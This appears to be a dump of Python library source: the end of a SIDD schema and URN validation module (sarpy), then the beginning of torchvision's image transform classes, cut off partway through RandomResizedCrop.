'urn:SICommon:0.1',\n 'version': '1.0',\n 'release': '1.0.0',\n 'date': '2011-08-31T00:00:00Z',\n 'schema': os.path.join(_the_directory, 'version1', 'SIDD_schema_V1.0.0_2011_08_31.xsd')},\n 'urn:SIDD:2.0.0': {\n 'ism_urn': 'urn:us:gov:ic:ism:13',\n 'sfa_urn': 'urn:SFA:1.2.0',\n 'sicommon_urn': 'urn:SICommon:1.0',\n 'version': '2.0',\n 'release': '2.0.0',\n 'date': '2019-05-31T00:00:00Z',\n 'schema': os.path.join(_the_directory, 'version2', 'SIDD_schema_V2.0.0_2019_05_31.xsd')},\n}\n_SIDD_SPECIFICATION_IDENTIFIER = 'SIDD Volume 1 Design & Implementation Description Document'\n\n\ndef get_specification_identifier():\n \"\"\"\n Get the SIDD specification identifier string.\n\n Returns\n -------\n str\n \"\"\"\n\n return _SIDD_SPECIFICATION_IDENTIFIER\n\n\ndef check_urn(urn_string):\n \"\"\"\n Checks that the urn string follows the correct pattern. 
This raises an\n exception for a poorly formed or unmapped SIDD urn.\n\n Parameters\n ----------\n urn_string : str\n \"\"\"\n\n if not isinstance(urn_string, str):\n raise TypeError(\n 'Expected a urn input of string type, got type {}'.format(type(urn_string)))\n\n the_match = re.match(r'^urn:SIDD:\\d.\\d.\\d$', urn_string)\n if the_match is None:\n raise ValueError(\n 'Input provided as `{}`,\\nbut should be of the form '\n '`urn:SIDD:..'.format(urn_string))\n\n\ndef get_urn_details(urn_string):\n \"\"\"\n Gets the associated details for the given SIDD urn, or raise an exception for\n poorly formatted or unrecognized urn.\n\n Parameters\n ----------\n urn_string\n\n Returns\n -------\n dict\n \"\"\"\n\n check_urn(urn_string)\n out = urn_mapping.get(urn_string, None)\n\n if out is None:\n raise KeyError(\n 'Got correctly formatted, but unmapped SIDD urn {}.'.format(urn_string))\n return out\n\n\ndef get_schema_path(the_urn):\n \"\"\"\n Gets the path to the proper schema file for the given SIDD urn.\n\n Parameters\n ----------\n the_urn : str\n\n Returns\n -------\n str\n \"\"\"\n\n result = get_urn_details(the_urn)\n return result['schema']\n\n\ndef get_versions():\n \"\"\"\n Gets a list of recognized SIDD urn.\n\n Returns\n -------\n List[str]\n \"\"\"\n\n return list(sorted(urn_mapping.keys()))\n\n\ndef validate_xml_ns(xml_ns, ns_key='default'):\n \"\"\"\n Validate the parsed SIDD xml namespace dictionary. This is expected to\n accompany the use of :func:`sarpy.io.general.utils.parse_xml_from_string`.\n\n Parameters\n ----------\n xml_ns : dict\n The xml namespace dictionary.\n ns_key : str\n The main SIDD element or default namespace.\n\n Returns\n -------\n bool\n \"\"\"\n\n def validate_ism_urn():\n if 'ism' not in xml_ns:\n the_val = None\n for key in xml_ns:\n val = xml_ns[key]\n if val.lower().startswith('urn:us:gov:ic:ism'):\n the_val = val\n xml_ns['ism'] = the_val\n\n valid = True\n if 'ism' not in xml_ns:\n logger.error('SIDD: No `ism` namespace defined.')\n valid = False\n elif xml_ns['ism'] != details['ism_urn']:\n logger.error(\n 'SIDD: SIDD {} `ISM` namespace urn is expected to be \"{}\", but we got \"{}\".\\n\\t'\n 'Differences in standard may lead to deserialization and/or '\n 'validation errors.'.format(sidd_urn, details['ism_urn'], xml_ns['ism']))\n valid = False\n return valid\n\n def validate_sfa_urn():\n if 'sfa' not in xml_ns:\n the_val = None\n for key in xml_ns:\n val = xml_ns[key]\n if val.lower().startswith('urn:sfa:'):\n the_val = val\n xml_ns['sfa'] = the_val\n\n valid = True\n if 'ism' not in xml_ns:\n logger.error('SIDD: No `sfa` namespace defined.')\n valid = False\n elif xml_ns['sfa'] != details['sfa_urn']:\n logger.error(\n 'SIDD: SIDD {} `SFA` namespace urn is expected to be \"{}\", but we got \"{}\".\\n\\t'\n 'Differences in standard may lead to deserialization and/or '\n 'validation errors.'.format(sidd_urn, details['sfa_urn'], xml_ns['sfa']))\n valid = False\n return valid\n\n def validate_sicommon_urn():\n if 'sicommon' not in xml_ns:\n the_val = None\n for key in xml_ns:\n val = xml_ns[key]\n if val.lower().startswith('urn:sicommon:'):\n the_val = val\n xml_ns['sicommon'] = the_val\n\n valid = True\n if 'sicommon' not in xml_ns:\n logger.error('SIDD: No `sicommon` namespace defined.')\n valid = False\n elif xml_ns['sicommon'] != details['sicommon_urn']:\n logger.error(\n 'SIDD: SIDD {} `SICommon` namespace urn is expected to be \"{}\", but we got \"{}\".\\n\\t'\n 'Differences in standard may lead to deserialization and/or '\n 'validation 
errors.'.format(sidd_urn, details['sicommon_urn'], xml_ns['sicommon']))\n valid = False\n return valid\n\n if not isinstance(xml_ns, dict):\n return ValueError('xml_ns must be a dictionary for SIDD interpretation.')\n\n if ns_key not in xml_ns:\n raise ValueError('ns_key must be a key in xml_ns.')\n\n sidd_urn = xml_ns[ns_key]\n\n try:\n details = get_urn_details(sidd_urn)\n except KeyError:\n logger.error('Got unmapped sidd urn `{}`'.format(sidd_urn))\n return False\n\n valid_ns = validate_ism_urn()\n valid_ns &= validate_sfa_urn()\n valid_ns &= validate_sicommon_urn()\n return valid_ns\n"} {"ext": "py", "sha": "1a308f4a7efa9513d5ce696d558fa62e035aa5ef", "content": "import math\nimport numbers\nimport random\nimport warnings\nfrom collections.abc import Sequence\nfrom typing import Tuple, List, Optional\n\nimport torch\nfrom torch import Tensor\n\ntry:\n import accimage\nexcept ImportError:\n accimage = None\n\nfrom . import functional as F\nfrom .functional import InterpolationMode, _interpolation_modes_from_int\n\n\n__all__ = [\"Compose\", \"ToTensor\", \"PILToTensor\", \"ConvertImageDtype\", \"ToPILImage\", \"Normalize\", \"Resize\", \"Scale\",\n \"CenterCrop\", \"Pad\", \"Lambda\", \"RandomApply\", \"RandomChoice\", \"RandomOrder\", \"RandomCrop\",\n \"RandomHorizontalFlip\", \"RandomVerticalFlip\", \"RandomResizedCrop\", \"RandomSizedCrop\", \"FiveCrop\", \"TenCrop\",\n \"LinearTransformation\", \"ColorJitter\", \"RandomRotation\", \"RandomAffine\", \"Grayscale\", \"RandomGrayscale\",\n \"RandomPerspective\", \"RandomErasing\", \"GaussianBlur\", \"InterpolationMode\", \"RandomInvert\", \"RandomPosterize\",\n \"RandomSolarize\", \"RandomAdjustSharpness\", \"RandomAutocontrast\", \"RandomEqualize\"]\n\n\nclass Compose:\n \"\"\"Composes several transforms together. This transform does not support torchscript.\n Please, see the note below.\n\n Args:\n transforms (list of ``Transform`` objects): list of transforms to compose.\n\n Example:\n >>> transforms.Compose([\n >>> transforms.CenterCrop(10),\n >>> transforms.ToTensor(),\n >>> ])\n\n .. note::\n In order to script the transformations, please use ``torch.nn.Sequential`` as below.\n\n >>> transforms = torch.nn.Sequential(\n >>> transforms.CenterCrop(10),\n >>> transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n >>> )\n >>> scripted_transforms = torch.jit.script(transforms)\n\n Make sure to use only scriptable transformations, i.e. that work with ``torch.Tensor``, does not require\n `lambda` functions or ``PIL.Image``.\n\n \"\"\"\n\n def __init__(self, transforms):\n self.transforms = transforms\n\n def __call__(self, img):\n for t in self.transforms:\n img = t(img)\n return img\n\n def __repr__(self):\n format_string = self.__class__.__name__ + '('\n for t in self.transforms:\n format_string += '\\n'\n format_string += ' {0}'.format(t)\n format_string += '\\n)'\n return format_string\n\n\nclass ToTensor:\n \"\"\"Convert a ``PIL Image`` or ``numpy.ndarray`` to tensor. This transform does not support torchscript.\n\n Converts a PIL Image or numpy.ndarray (H x W x C) in the range\n [0, 255] to a torch.FloatTensor of shape (C x H x W) in the range [0.0, 1.0]\n if the PIL Image belongs to one of the modes (L, LA, P, I, F, RGB, YCbCr, RGBA, CMYK, 1)\n or if the numpy.ndarray has dtype = np.uint8\n\n In the other cases, tensors are returned without scaling.\n\n .. note::\n Because the input image is scaled to [0.0, 1.0], this transformation should not be used when\n transforming target image masks. 
See the `references`_ for implementing the transforms for image masks.\n\n .. _references: https://github.com/pytorch/vision/tree/master/references/segmentation\n \"\"\"\n\n def __call__(self, pic):\n \"\"\"\n Args:\n pic (PIL Image or numpy.ndarray): Image to be converted to tensor.\n\n Returns:\n Tensor: Converted image.\n \"\"\"\n return F.to_tensor(pic)\n\n def __repr__(self):\n return self.__class__.__name__ + '()'\n\n\nclass PILToTensor:\n \"\"\"Convert a ``PIL Image`` to a tensor of the same type. This transform does not support torchscript.\n\n Converts a PIL Image (H x W x C) to a Tensor of shape (C x H x W).\n \"\"\"\n\n def __call__(self, pic):\n \"\"\"\n Args:\n pic (PIL Image): Image to be converted to tensor.\n\n Returns:\n Tensor: Converted image.\n \"\"\"\n return F.pil_to_tensor(pic)\n\n def __repr__(self):\n return self.__class__.__name__ + '()'\n\n\nclass ConvertImageDtype(torch.nn.Module):\n \"\"\"Convert a tensor image to the given ``dtype`` and scale the values accordingly\n This function does not support PIL Image.\n\n Args:\n dtype (torch.dtype): Desired data type of the output\n\n .. note::\n\n When converting from a smaller to a larger integer ``dtype`` the maximum values are **not** mapped exactly.\n If converted back and forth, this mismatch has no effect.\n\n Raises:\n RuntimeError: When trying to cast :class:`torch.float32` to :class:`torch.int32` or :class:`torch.int64` as\n well as for trying to cast :class:`torch.float64` to :class:`torch.int64`. These conversions might lead to\n overflow errors since the floating point ``dtype`` cannot store consecutive integers over the whole range\n of the integer ``dtype``.\n \"\"\"\n\n def __init__(self, dtype: torch.dtype) -> None:\n super().__init__()\n self.dtype = dtype\n\n def forward(self, image):\n return F.convert_image_dtype(image, self.dtype)\n\n\nclass ToPILImage:\n \"\"\"Convert a tensor or an ndarray to PIL Image. This transform does not support torchscript.\n\n Converts a torch.*Tensor of shape C x H x W or a numpy ndarray of shape\n H x W x C to a PIL Image while preserving the value range.\n\n Args:\n mode (`PIL.Image mode`_): color space and pixel depth of input data (optional).\n If ``mode`` is ``None`` (default) there are some assumptions made about the input data:\n - If the input has 4 channels, the ``mode`` is assumed to be ``RGBA``.\n - If the input has 3 channels, the ``mode`` is assumed to be ``RGB``.\n - If the input has 2 channels, the ``mode`` is assumed to be ``LA``.\n - If the input has 1 channel, the ``mode`` is determined by the data type (i.e ``int``, ``float``,\n ``short``).\n\n .. 
_PIL.Image mode: https://pillow.readthedocs.io/en/latest/handbook/concepts.html#concept-modes\n \"\"\"\n def __init__(self, mode=None):\n self.mode = mode\n\n def __call__(self, pic):\n \"\"\"\n Args:\n pic (Tensor or numpy.ndarray): Image to be converted to PIL Image.\n\n Returns:\n PIL Image: Image converted to PIL Image.\n\n \"\"\"\n return F.to_pil_image(pic, self.mode)\n\n def __repr__(self):\n format_string = self.__class__.__name__ + '('\n if self.mode is not None:\n format_string += 'mode={0}'.format(self.mode)\n format_string += ')'\n return format_string\n\n\nclass Normalize(torch.nn.Module):\n \"\"\"Normalize a tensor image with mean and standard deviation.\n This transform does not support PIL Image.\n Given mean: ``(mean[1],...,mean[n])`` and std: ``(std[1],..,std[n])`` for ``n``\n channels, this transform will normalize each channel of the input\n ``torch.*Tensor`` i.e.,\n ``output[channel] = (input[channel] - mean[channel]) / std[channel]``\n\n .. note::\n This transform acts out of place, i.e., it does not mutate the input tensor.\n\n Args:\n mean (sequence): Sequence of means for each channel.\n std (sequence): Sequence of standard deviations for each channel.\n inplace(bool,optional): Bool to make this operation in-place.\n\n \"\"\"\n\n def __init__(self, mean, std, inplace=False):\n super().__init__()\n self.mean = mean\n self.std = std\n self.inplace = inplace\n\n def forward(self, tensor: Tensor) -> Tensor:\n \"\"\"\n Args:\n tensor (Tensor): Tensor image to be normalized.\n\n Returns:\n Tensor: Normalized Tensor image.\n \"\"\"\n return F.normalize(tensor, self.mean, self.std, self.inplace)\n\n def __repr__(self):\n return self.__class__.__name__ + '(mean={0}, std={1})'.format(self.mean, self.std)\n\n\nclass Resize(torch.nn.Module):\n \"\"\"Resize the input image to the given size.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading dimensions\n\n Args:\n size (sequence or int): Desired output size. If size is a sequence like\n (h, w), output size will be matched to this. If size is an int,\n smaller edge of the image will be matched to this number.\n i.e, if height > width, then image will be rescaled to\n (size * height / width, size).\n In torchscript mode size as single int is not supported, use a sequence of length 1: ``[size, ]``.\n interpolation (InterpolationMode): Desired interpolation enum defined by\n :class:`torchvision.transforms.InterpolationMode`. Default is ``InterpolationMode.BILINEAR``.\n If input is Tensor, only ``InterpolationMode.NEAREST``, ``InterpolationMode.BILINEAR`` and\n ``InterpolationMode.BICUBIC`` are supported.\n For backward compatibility integer values (e.g. ``PIL.Image.NEAREST``) are still acceptable.\n\n \"\"\"\n\n def __init__(self, size, interpolation=InterpolationMode.BILINEAR):\n super().__init__()\n if not isinstance(size, (int, Sequence)):\n raise TypeError(\"Size should be int or sequence. Got {}\".format(type(size)))\n if isinstance(size, Sequence) and len(size) not in (1, 2):\n raise ValueError(\"If size is a sequence, it should have 1 or 2 values\")\n self.size = size\n\n # Backward compatibility with integer value\n if isinstance(interpolation, int):\n warnings.warn(\n \"Argument interpolation should be of type InterpolationMode instead of int. 
\"\n \"Please, use InterpolationMode enum.\"\n )\n interpolation = _interpolation_modes_from_int(interpolation)\n\n self.interpolation = interpolation\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be scaled.\n\n Returns:\n PIL Image or Tensor: Rescaled image.\n \"\"\"\n return F.resize(img, self.size, self.interpolation)\n\n def __repr__(self):\n interpolate_str = self.interpolation.value\n return self.__class__.__name__ + '(size={0}, interpolation={1})'.format(self.size, interpolate_str)\n\n\nclass Scale(Resize):\n \"\"\"\n Note: This transform is deprecated in favor of Resize.\n \"\"\"\n def __init__(self, *args, **kwargs):\n warnings.warn(\"The use of the transforms.Scale transform is deprecated, \" +\n \"please use transforms.Resize instead.\")\n super(Scale, self).__init__(*args, **kwargs)\n\n\nclass CenterCrop(torch.nn.Module):\n \"\"\"Crops the given image at the center.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading dimensions\n\n Args:\n size (sequence or int): Desired output size of the crop. If size is an\n int instead of sequence like (h, w), a square crop (size, size) is\n made. If provided a sequence of length 1, it will be interpreted as (size[0], size[0]).\n \"\"\"\n\n def __init__(self, size):\n super().__init__()\n self.size = _setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\")\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be cropped.\n\n Returns:\n PIL Image or Tensor: Cropped image.\n \"\"\"\n return F.center_crop(img, self.size)\n\n def __repr__(self):\n return self.__class__.__name__ + '(size={0})'.format(self.size)\n\n\nclass Pad(torch.nn.Module):\n \"\"\"Pad the given image on all sides with the given \"pad\" value.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading dimensions\n\n Args:\n padding (int or sequence): Padding on each border. If a single int is provided this\n is used to pad all borders. If sequence of length 2 is provided this is the padding\n on left/right and top/bottom respectively. If a sequence of length 4 is provided\n this is the padding for the left, top, right and bottom borders respectively.\n In torchscript mode padding as single int is not supported, use a sequence of length 1: ``[padding, ]``.\n fill (number or str or tuple): Pixel fill value for constant fill. Default is 0. If a tuple of\n length 3, it is used to fill R, G, B channels respectively.\n This value is only used when the padding_mode is constant.\n Only number is supported for torch Tensor.\n Only int or str or tuple value is supported for PIL Image.\n padding_mode (str): Type of padding. 
Should be: constant, edge, reflect or symmetric.\n Default is constant.\n\n - constant: pads with a constant value, this value is specified with fill\n\n - edge: pads with the last value at the edge of the image\n\n - reflect: pads with reflection of image without repeating the last value on the edge\n\n For example, padding [1, 2, 3, 4] with 2 elements on both sides in reflect mode\n will result in [3, 2, 1, 2, 3, 4, 3, 2]\n\n - symmetric: pads with reflection of image repeating the last value on the edge\n\n For example, padding [1, 2, 3, 4] with 2 elements on both sides in symmetric mode\n will result in [2, 1, 1, 2, 3, 4, 4, 3]\n \"\"\"\n\n def __init__(self, padding, fill=0, padding_mode=\"constant\"):\n super().__init__()\n if not isinstance(padding, (numbers.Number, tuple, list)):\n raise TypeError(\"Got inappropriate padding arg\")\n\n if not isinstance(fill, (numbers.Number, str, tuple)):\n raise TypeError(\"Got inappropriate fill arg\")\n\n if padding_mode not in [\"constant\", \"edge\", \"reflect\", \"symmetric\"]:\n raise ValueError(\"Padding mode should be either constant, edge, reflect or symmetric\")\n\n if isinstance(padding, Sequence) and len(padding) not in [1, 2, 4]:\n raise ValueError(\"Padding must be an int or a 1, 2, or 4 element tuple, not a \" +\n \"{} element tuple\".format(len(padding)))\n\n self.padding = padding\n self.fill = fill\n self.padding_mode = padding_mode\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be padded.\n\n Returns:\n PIL Image or Tensor: Padded image.\n \"\"\"\n return F.pad(img, self.padding, self.fill, self.padding_mode)\n\n def __repr__(self):\n return self.__class__.__name__ + '(padding={0}, fill={1}, padding_mode={2})'.\\\n format(self.padding, self.fill, self.padding_mode)\n\n\nclass Lambda:\n \"\"\"Apply a user-defined lambda as a transform. This transform does not support torchscript.\n\n Args:\n lambd (function): Lambda/function to be used for transform.\n \"\"\"\n\n def __init__(self, lambd):\n if not callable(lambd):\n raise TypeError(\"Argument lambd should be callable, got {}\".format(repr(type(lambd).__name__)))\n self.lambd = lambd\n\n def __call__(self, img):\n return self.lambd(img)\n\n def __repr__(self):\n return self.__class__.__name__ + '()'\n\n\nclass RandomTransforms:\n \"\"\"Base class for a list of transformations with randomness\n\n Args:\n transforms (sequence): list of transformations\n \"\"\"\n\n def __init__(self, transforms):\n if not isinstance(transforms, Sequence):\n raise TypeError(\"Argument transforms should be a sequence\")\n self.transforms = transforms\n\n def __call__(self, *args, **kwargs):\n raise NotImplementedError()\n\n def __repr__(self):\n format_string = self.__class__.__name__ + '('\n for t in self.transforms:\n format_string += '\\n'\n format_string += ' {0}'.format(t)\n format_string += '\\n)'\n return format_string\n\n\nclass RandomApply(torch.nn.Module):\n \"\"\"Apply randomly a list of transformations with a given probability.\n\n .. note::\n In order to script the transformation, please use ``torch.nn.ModuleList`` as input instead of list/tuple of\n transforms as shown below:\n\n >>> transforms = transforms.RandomApply(torch.nn.ModuleList([\n >>> transforms.ColorJitter(),\n >>> ]), p=0.3)\n >>> scripted_transforms = torch.jit.script(transforms)\n\n Make sure to use only scriptable transformations, i.e. 
that work with ``torch.Tensor``, does not require\n `lambda` functions or ``PIL.Image``.\n\n Args:\n transforms (sequence or torch.nn.Module): list of transformations\n p (float): probability\n \"\"\"\n\n def __init__(self, transforms, p=0.5):\n super().__init__()\n self.transforms = transforms\n self.p = p\n\n def forward(self, img):\n if self.p < torch.rand(1):\n return img\n for t in self.transforms:\n img = t(img)\n return img\n\n def __repr__(self):\n format_string = self.__class__.__name__ + '('\n format_string += '\\n p={}'.format(self.p)\n for t in self.transforms:\n format_string += '\\n'\n format_string += ' {0}'.format(t)\n format_string += '\\n)'\n return format_string\n\n\nclass RandomOrder(RandomTransforms):\n \"\"\"Apply a list of transformations in a random order. This transform does not support torchscript.\n \"\"\"\n def __call__(self, img):\n order = list(range(len(self.transforms)))\n random.shuffle(order)\n for i in order:\n img = self.transforms[i](img)\n return img\n\n\nclass RandomChoice(RandomTransforms):\n \"\"\"Apply single transformation randomly picked from a list. This transform does not support torchscript.\n \"\"\"\n def __call__(self, img):\n t = random.choice(self.transforms)\n return t(img)\n\n\nclass RandomCrop(torch.nn.Module):\n \"\"\"Crop the given image at a random location.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading dimensions\n\n Args:\n size (sequence or int): Desired output size of the crop. If size is an\n int instead of sequence like (h, w), a square crop (size, size) is\n made. If provided a sequence of length 1, it will be interpreted as (size[0], size[0]).\n padding (int or sequence, optional): Optional padding on each border\n of the image. Default is None. If a single int is provided this\n is used to pad all borders. If sequence of length 2 is provided this is the padding\n on left/right and top/bottom respectively. If a sequence of length 4 is provided\n this is the padding for the left, top, right and bottom borders respectively.\n In torchscript mode padding as single int is not supported, use a sequence of length 1: ``[padding, ]``.\n pad_if_needed (boolean): It will pad the image if smaller than the\n desired size to avoid raising an exception. Since cropping is done\n after padding, the padding seems to be done at a random offset.\n fill (number or str or tuple): Pixel fill value for constant fill. Default is 0. If a tuple of\n length 3, it is used to fill R, G, B channels respectively.\n This value is only used when the padding_mode is constant.\n Only number is supported for torch Tensor.\n Only int or str or tuple value is supported for PIL Image.\n padding_mode (str): Type of padding. Should be: constant, edge, reflect or symmetric. 
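        A short, hypothetical usage sketch (``img`` below is assumed to be an existing
        PIL Image or tensor image; it is not defined in this module, and the values are
        arbitrary examples):

            >>> cropper = RandomCrop(32, padding=4, padding_mode='reflect')
            >>> out = cropper(img)    # random 32x32 crop taken from the reflection-padded image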
Default is constant.\n\n - constant: pads with a constant value, this value is specified with fill\n\n - edge: pads with the last value on the edge of the image\n\n - reflect: pads with reflection of image (without repeating the last value on the edge)\n\n padding [1, 2, 3, 4] with 2 elements on both sides in reflect mode\n will result in [3, 2, 1, 2, 3, 4, 3, 2]\n\n - symmetric: pads with reflection of image (repeating the last value on the edge)\n\n padding [1, 2, 3, 4] with 2 elements on both sides in symmetric mode\n will result in [2, 1, 1, 2, 3, 4, 4, 3]\n\n \"\"\"\n\n @staticmethod\n def get_params(img: Tensor, output_size: Tuple[int, int]) -> Tuple[int, int, int, int]:\n \"\"\"Get parameters for ``crop`` for a random crop.\n\n Args:\n img (PIL Image or Tensor): Image to be cropped.\n output_size (tuple): Expected output size of the crop.\n\n Returns:\n tuple: params (i, j, h, w) to be passed to ``crop`` for random crop.\n \"\"\"\n w, h = F._get_image_size(img)\n th, tw = output_size\n\n if h + 1 < th or w + 1 < tw:\n raise ValueError(\n \"Required crop size {} is larger then input image size {}\".format((th, tw), (h, w))\n )\n\n if w == tw and h == th:\n return 0, 0, h, w\n\n i = torch.randint(0, h - th + 1, size=(1, )).item()\n j = torch.randint(0, w - tw + 1, size=(1, )).item()\n return i, j, th, tw\n\n def __init__(self, size, padding=None, pad_if_needed=False, fill=0, padding_mode=\"constant\"):\n super().__init__()\n\n self.size = tuple(_setup_size(\n size, error_msg=\"Please provide only two dimensions (h, w) for size.\"\n ))\n\n self.padding = padding\n self.pad_if_needed = pad_if_needed\n self.fill = fill\n self.padding_mode = padding_mode\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be cropped.\n\n Returns:\n PIL Image or Tensor: Cropped image.\n \"\"\"\n if self.padding is not None:\n img = F.pad(img, self.padding, self.fill, self.padding_mode)\n\n width, height = F._get_image_size(img)\n # pad the width if needed\n if self.pad_if_needed and width < self.size[1]:\n padding = [self.size[1] - width, 0]\n img = F.pad(img, padding, self.fill, self.padding_mode)\n # pad the height if needed\n if self.pad_if_needed and height < self.size[0]:\n padding = [0, self.size[0] - height]\n img = F.pad(img, padding, self.fill, self.padding_mode)\n\n i, j, h, w = self.get_params(img, self.size)\n\n return F.crop(img, i, j, h, w)\n\n def __repr__(self):\n return self.__class__.__name__ + \"(size={0}, padding={1})\".format(self.size, self.padding)\n\n\nclass RandomHorizontalFlip(torch.nn.Module):\n \"\"\"Horizontally flip the given image randomly with a given probability.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading\n dimensions\n\n Args:\n p (float): probability of the image being flipped. Default value is 0.5\n \"\"\"\n\n def __init__(self, p=0.5):\n super().__init__()\n self.p = p\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be flipped.\n\n Returns:\n PIL Image or Tensor: Randomly flipped image.\n \"\"\"\n if torch.rand(1) < self.p:\n return F.hflip(img)\n return img\n\n def __repr__(self):\n return self.__class__.__name__ + '(p={})'.format(self.p)\n\n\nclass RandomVerticalFlip(torch.nn.Module):\n \"\"\"Vertically flip the given image randomly with a given probability.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... 
means an arbitrary number of leading\n dimensions\n\n Args:\n p (float): probability of the image being flipped. Default value is 0.5\n \"\"\"\n\n def __init__(self, p=0.5):\n super().__init__()\n self.p = p\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be flipped.\n\n Returns:\n PIL Image or Tensor: Randomly flipped image.\n \"\"\"\n if torch.rand(1) < self.p:\n return F.vflip(img)\n return img\n\n def __repr__(self):\n return self.__class__.__name__ + '(p={})'.format(self.p)\n\n\nclass RandomPerspective(torch.nn.Module):\n \"\"\"Performs a random perspective transformation of the given image with a given probability.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading dimensions.\n\n Args:\n distortion_scale (float): argument to control the degree of distortion and ranges from 0 to 1.\n Default is 0.5.\n p (float): probability of the image being transformed. Default is 0.5.\n interpolation (InterpolationMode): Desired interpolation enum defined by\n :class:`torchvision.transforms.InterpolationMode`. Default is ``InterpolationMode.BILINEAR``.\n If input is Tensor, only ``InterpolationMode.NEAREST``, ``InterpolationMode.BILINEAR`` are supported.\n For backward compatibility integer values (e.g. ``PIL.Image.NEAREST``) are still acceptable.\n fill (sequence or number, optional): Pixel fill value for the area outside the transformed\n image. If given a number, the value is used for all bands respectively.\n If input is PIL Image, the options is only available for ``Pillow>=5.0.0``.\n \"\"\"\n\n def __init__(self, distortion_scale=0.5, p=0.5, interpolation=InterpolationMode.BILINEAR, fill=0):\n super().__init__()\n self.p = p\n\n # Backward compatibility with integer value\n if isinstance(interpolation, int):\n warnings.warn(\n \"Argument interpolation should be of type InterpolationMode instead of int. 
\"\n \"Please, use InterpolationMode enum.\"\n )\n interpolation = _interpolation_modes_from_int(interpolation)\n\n self.interpolation = interpolation\n self.distortion_scale = distortion_scale\n self.fill = fill\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be Perspectively transformed.\n\n Returns:\n PIL Image or Tensor: Randomly transformed image.\n \"\"\"\n\n fill = self.fill\n if isinstance(img, Tensor):\n if isinstance(fill, (int, float)):\n fill = [float(fill)] * F._get_image_num_channels(img)\n else:\n fill = [float(f) for f in fill]\n\n if torch.rand(1) < self.p:\n width, height = F._get_image_size(img)\n startpoints, endpoints = self.get_params(width, height, self.distortion_scale)\n return F.perspective(img, startpoints, endpoints, self.interpolation, fill)\n return img\n\n @staticmethod\n def get_params(width: int, height: int, distortion_scale: float) -> Tuple[List[List[int]], List[List[int]]]:\n \"\"\"Get parameters for ``perspective`` for a random perspective transform.\n\n Args:\n width (int): width of the image.\n height (int): height of the image.\n distortion_scale (float): argument to control the degree of distortion and ranges from 0 to 1.\n\n Returns:\n List containing [top-left, top-right, bottom-right, bottom-left] of the original image,\n List containing [top-left, top-right, bottom-right, bottom-left] of the transformed image.\n \"\"\"\n half_height = height // 2\n half_width = width // 2\n topleft = [\n int(torch.randint(0, int(distortion_scale * half_width) + 1, size=(1, )).item()),\n int(torch.randint(0, int(distortion_scale * half_height) + 1, size=(1, )).item())\n ]\n topright = [\n int(torch.randint(width - int(distortion_scale * half_width) - 1, width, size=(1, )).item()),\n int(torch.randint(0, int(distortion_scale * half_height) + 1, size=(1, )).item())\n ]\n botright = [\n int(torch.randint(width - int(distortion_scale * half_width) - 1, width, size=(1, )).item()),\n int(torch.randint(height - int(distortion_scale * half_height) - 1, height, size=(1, )).item())\n ]\n botleft = [\n int(torch.randint(0, int(distortion_scale * half_width) + 1, size=(1, )).item()),\n int(torch.randint(height - int(distortion_scale * half_height) - 1, height, size=(1, )).item())\n ]\n startpoints = [[0, 0], [width - 1, 0], [width - 1, height - 1], [0, height - 1]]\n endpoints = [topleft, topright, botright, botleft]\n return startpoints, endpoints\n\n def __repr__(self):\n return self.__class__.__name__ + '(p={})'.format(self.p)\n\n\nclass RandomResizedCrop(torch.nn.Module):\n \"\"\"Crop the given image to random size and aspect ratio.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading dimensions\n\n A crop of random size (default: of 0.08 to 1.0) of the original size and a random\n aspect ratio (default: of 3/4 to 4/3) of the original aspect ratio is made. This crop\n is finally resized to given size.\n This is popularly used to train the Inception networks.\n\n Args:\n size (int or sequence): expected output size of each edge. If size is an\n int instead of sequence like (h, w), a square output size ``(size, size)`` is\n made. 
If provided a sequence of length 1, it will be interpreted as (size[0], size[0]).\n In torchscript mode size as single int is not supported, use a sequence of length 1: ``[size, ]``.\n scale (tuple of float): scale range of the cropped image before resizing, relatively to the origin image.\n ratio (tuple of float): aspect ratio range of the cropped image before resizing.\n interpolation (InterpolationMode): Desired interpolation enum defined by\n :class:`torchvision.transforms.InterpolationMode`. Default is ``InterpolationMode.BILINEAR``.\n If input is Tensor, only ``InterpolationMode.NEAREST``, ``InterpolationMode.BILINEAR`` and\n ``InterpolationMode.BICUBIC`` are supported.\n For backward compatibility integer values (e.g. ``PIL.Image.NEAREST``) are still acceptable.\n\n \"\"\"\n\n def __init__(self, size, scale=(0.08, 1.0), ratio=(3. / 4., 4. / 3.), interpolation=InterpolationMode.BILINEAR):\n super().__init__()\n self.size = _setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\")\n\n if not isinstance(scale, Sequence):\n raise TypeError(\"Scale should be a sequence\")\n if not isinstance(ratio, Sequence):\n raise TypeError(\"Ratio should be a sequence\")\n if (scale[0] > scale[1]) or (ratio[0] > ratio[1]):\n warnings.warn(\"Scale and ratio should be of kind (min, max)\")\n\n # Backward compatibility with integer value\n if isinstance(interpolation, int):\n warnings.warn(\n \"Argument interpolation should be of type InterpolationMode instead of int. \"\n \"Please, use InterpolationMode enum.\"\n )\n interpolation = _interpolation_modes_from_int(interpolation)\n\n self.interpolation = interpolation\n self.scale = scale\n self.ratio = ratio\n\n @staticmethod\n def get_params(\n img: Tensor, scale: List[float], ratio: List[float]\n ) -> Tuple[int, int, int, int]:\n 